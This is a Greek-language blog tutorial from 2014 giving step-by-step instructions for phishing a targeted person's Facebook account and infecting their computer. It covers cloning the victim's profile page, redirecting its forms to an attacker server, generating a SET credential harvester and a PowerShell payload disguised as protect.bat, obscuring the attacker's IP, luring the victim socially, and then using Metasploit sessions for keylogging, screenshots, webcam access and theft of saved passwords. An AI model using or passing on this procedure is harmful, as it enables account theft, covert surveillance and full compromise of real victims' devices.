ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Δευτέρα, 3 Νοεμβρίου 2014

Πως κλεβουμε κωδικους facebook απο στοχευμενο χρηστη (Advance Phishing and Ιnfection)


Τι θα χρειαστειτε;

1.Kali linux


Γραφουμε σε ενα τερματικο

curl ifconfig.me

αυτη θα ειναι η εξωτερικη σας ip σημειωστε την
εγω στον οδηγο θα χρησιμοποιηω την εσωτερικη μου ip 192.168.1.4 εσεις θα βαζετε την εξωτερικη σας οπου βλεπετε 192.168.1.4

τωρα πηγαινουμε στο προφιλ του θυματος πχ


παταμε ctrl+u ,επιλεγουμε μεσα τον κωδικα παταμε ctrl+a ωστε να τα επιλεξουμε ολα και ctrl+c για να κανουμε αντιγραφη

δημιουργουμε ενα αρχειο index.html στην επιφανεια εργασιας



το ανοιγουμε με leafpad και με ctrl+v κανουμε επικοληση η με δεξι κλικ και paste

 παταμε ctrl+Η και γραφουμε Εγγραφή  και απο κατω Αναφορά

μετα παταμε ctrl+f και γραφουμε Aναφορά

αλλαζουμε ολο το href "περιεχομενο""με href "http://192.168.1.4/report.html"


πχ


το ξαναλεω εσεις θα βαλετε πχ http"//exoterikhip/report.html

παταμε παλι ctrl+f και γραφουμε action=https

και κανουμε την αντικατασταση με http://192.168.1.4/post.php


μετα παλι παταμε με ctrl+F και ψαχνουμε για /login.php?next=https

και κανουμε την αντικατασταση πριν το ? δλδ http"//192.168.1.4/login.html



παταμε παλι ctr+h και γραφουμε το ονομα του θυματος οπως το εμφανιζει η σελιδα πχ εμενα ειναι Koula Gourdoumpouli

και απο κατω σε οτι πιστευετε οτι μπορει να ενοχλησει το θυμα


επιλεγουμε Find and Replace

τελος παταμε ctrl+f και γραφουμε να μας βρει "Για να συνδεθείτε" χωρις τα ""

και το αλαλζουμε σε "Κάντε αναφορά η συνθεθείτε στο facebook"



αποθηκευουμε το αρχειο index.html

οταν το ανοιξουμε θα μας το ανοιξει με το iceweasel και θα μας εμφανισει αυτο



μετα γραφουμε σε ενα τερματικο

setoolkit

επιλεγουμε 1
επιλεγουμε 2
επιλεγουμε 3


επιλεγουμε 2
 βαζουμε την εξωτερικη μας ip


γραφουμε https://www.facebook.com

 και το SET μας εφτιαξε την ψευτικη σελιδα του facebook


τωρα παταμε enter και επιλεγουμε 99

μετα επιλεγουμε 9


 επιλεγουμε 1

γραφουμε την ip μας και την θυρα που θελουμε να ακουει ο ιος μας
πχ 192.168.1.4 και θυρα 7777 μετα επιλεγουμε yes
το metasploit τωρα θα περιμενει για να τρεξει το θυμα το κακοβουλο αρχειο

  η αν θελουμε  το armitage επιλεγουμε no, κλεινουμε  το τερματικο και ξεκιναμε το armitage  δειτε παλιοτερο οδηγο

τωρα μας μενει να μεταφερουμε τον ιο στο /var/www με την εντολη

 mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/

πηγαινουμε στο /var/www και εκει
ονομαζουμε το index.html που μας δημιουργησε το SET σε login.html
μετα ονομαζουμε το x86_powershell_injection.txt σε protect.bat
μετα κατεβαζουμε αυτα τα αρχεια εδω

τα κανουμε extract

και τα μεταφερουμε στο /var/www

πηγαινουμε στο /var/www και εκει μεταφερουμε το index.html το οποιο φτιαξαμε απο το προφιλ του θυματος

οποτε στο /var/www/ πρεπει να εχουμε τα εξεις αρχεια
index.html - αυτο που φτιαξαμε απο το προφιλ του θυματος
login.html - αυτο που μας εφτιαξε το SET και το ονομασαμε ετσι
post.php το εφτιαξε το SET
harvester.txt τo εφτιαξε το SET
report_html -τον φακελο που καταβασατε
report.html τον αρχειο που κατεβασατε
protect.bat ο ιος που φτιαξαμε με το SET

τωρα ανοιγουμε το αρχειο report.html με leafpad
παταμε ctrl+h και βαζουμε πανω 192.168.1.4 και απο κατω να γινει
αντικατασταση με την εξωτερικη σας ip


 επιλεγουμε Find and Replace και αποθηκευουμε

τωρα ειμαστε ετοιμοι να κανουμε την επιθεση μας

*προσοχη πρεπει να προωθησετε την θυρα 80 και την θυρα 7777 στο ρουτερ σας η να επιλεξετε dmz ετσι ωστε να μπορει να ενωθει το θυμα με εσας και να μην τον εμποδιζει το firewall του ρουτερ σας
κοιταξτε παλιοτερους οδηγους

τωρα το μονο που μενει ειναι να κρυψετε την εξωτερικη σας ip πχ

στο θυμα μας θα στειλουμε http://192.168.1.4 και  θα πουμε οτι της εχουνε φτιαξει ψευτικο προφιλ εδω πεζει σημαντικο ρολος η κοινωνικη μηχανικη

ομως το http://192.168.1.4 ειναι υποπτο γιατι ειναι μια ip

οποτε θα μετατρεψουμε την ip μας σε δεκαδικη

πολλαπλασιαζουμε και προσθετουμε οπως κατω πχ
την ip 192.168.1.4

192 * 256 + 168 = * 256 + 1 = * 256 + 4 =3232235780
 
οποτε 192.168.1.4 ειναι το ιδιο με 3232235780
 
και 3232235780/?www.facebook.com οτι βαλουμε μετα το /? δεν ισχυει
και θα γινει http://3232235780/?www.facebook.com

η μπορουμε να χρησιμοποιησουμε ενα online url shortener πατηστε εδω

οταν πατησει το θυμα θα του εμφανιστει αυτο


 αν βαλει τα κριτηρια συνδεσεις του  απο πανω τοτε θα σας ερθουνε
αν πατησει Συνδεση τοτε θα τον ανακατεθυνει στο login.html που παλι αν βαλει τα κρητηρια συνδεσης του τοτε θα σας ερθουνε


αν πατησει αναφορα τοτε θα του εμφανισει αυτη την σελιδα η οποια αν ακολουθησει τα βηματα θα κατεβασει τον ιο και θα μας ανοιξει μια συνεδρια με το θυμα μας

 Για να δουμε τους κωδικους γραφουμε σε ενα τερματικο

tail -f /var/www/harvester*.txt


και οταν το θυμα τρεξει το αρχειο θα μας ανοιξει μια συνεδρια δειτε κατω με το metasploit


παταμε enter και γραφουμε sessions -v


για να επιδρασουμε με καποια συνεδρια γραφουμε sessions -i 1


και οπως βλεπετε με την εντολη screenshot πηρα ληψη της επιφανειας εργασιας του θυματος

ποιο βολικο ομως ειναι το armitage που ειναι η γραφικη μορφη του metasploit πχ κατω βλεπετε το θυμα και την εικονα της επιφανειας εργασιας του

 απο εκει και περα μπορειτε να παρετε οχι μονο κωδικους facebook αλλα και οτι κωδικους εχει αποθηκευσει το θυμα στο browser του

πχ τωρα τρεχω keylogger και οτι πληκτρολογει το θυμα μου εμφανιζετε


Τα antivirus δεν βρισκουνε τιποτα με αυτη την μεθοδο οποτε εχετε τον πληρη ελενχο στο θυμα ακομα και σε καμερα και μικροφωνο πχ ας δουμε την καμερα του θυματος


Προσοχη για να μην χασετε την συνεδρια πρεπει να εχετε κανει persist στο θυμα κοιταξτε παλιοτερο οδηγο με veil
και επισης να ξερετε αν ανοιξετε την καμερα στο θυμα θα το καταλαβει απο το λαμπακι

Αυτος ο οδηγος ειναι ενας απο τους πολλους που εχει "Το Βιβλιο της Αγαπης"

Δεν υπάρχουν σχόλια: